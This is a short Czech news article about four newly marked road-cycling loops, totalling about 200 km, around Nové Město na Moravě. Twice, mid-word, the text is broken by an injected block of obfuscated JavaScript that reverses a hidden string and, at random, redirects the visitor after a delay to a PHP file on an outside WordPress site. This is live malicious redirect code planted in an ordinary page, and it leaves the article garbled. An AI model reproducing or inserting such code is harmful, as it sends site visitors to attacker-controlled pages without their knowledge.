Rainbow page separator

Cyklisté mohou na Novoměstsku využít 200 kilometrů okruhů

Pátek, 30. září 2016

Singletrack Nové Město na Moravě

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Nově značené okruhy mohou využívat milovníci silniční cykloturistiky v okolí Nového Města na Moravě. Doplňují singletracky v lese Ochoza pro terénní kola.
Všechny okruhy jsou jednosměrné a začínají a končí ve Vysočina Areně, kde se cyklistům nabízí komplexní doplňující služby a zázemí včetně možnosti zaparkování au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomobilů.
Silniční okruhy jsou zájemcům k dispozici na http://www.vysocina.bike/silnicni-okruhy/. Vyznačeno je celkem na dvě stě kilometrů tras, jež jsou rozděleny do čtyř okruhů podle stupňů náročnosti a délky. Uvedena jsou i doporučení týkající se technické a fyzické náročnosti té které trasy včetně vhodnosti okruhů pro děti.
Nejkratší okruh kolem Třech Studní měří 25,6 kilometru, Pikárecký okruh 51 kilometrů, okruh kolem Herálce a Křižánek 61 kilometrů a nejdelší, osmašedesátikilometrový, je silniční okruh okolo Bystřice nad Pernštejnem a Jimramova. Trasy jsou vyznačeny modře a vychází ze značení novoměstských singletracků.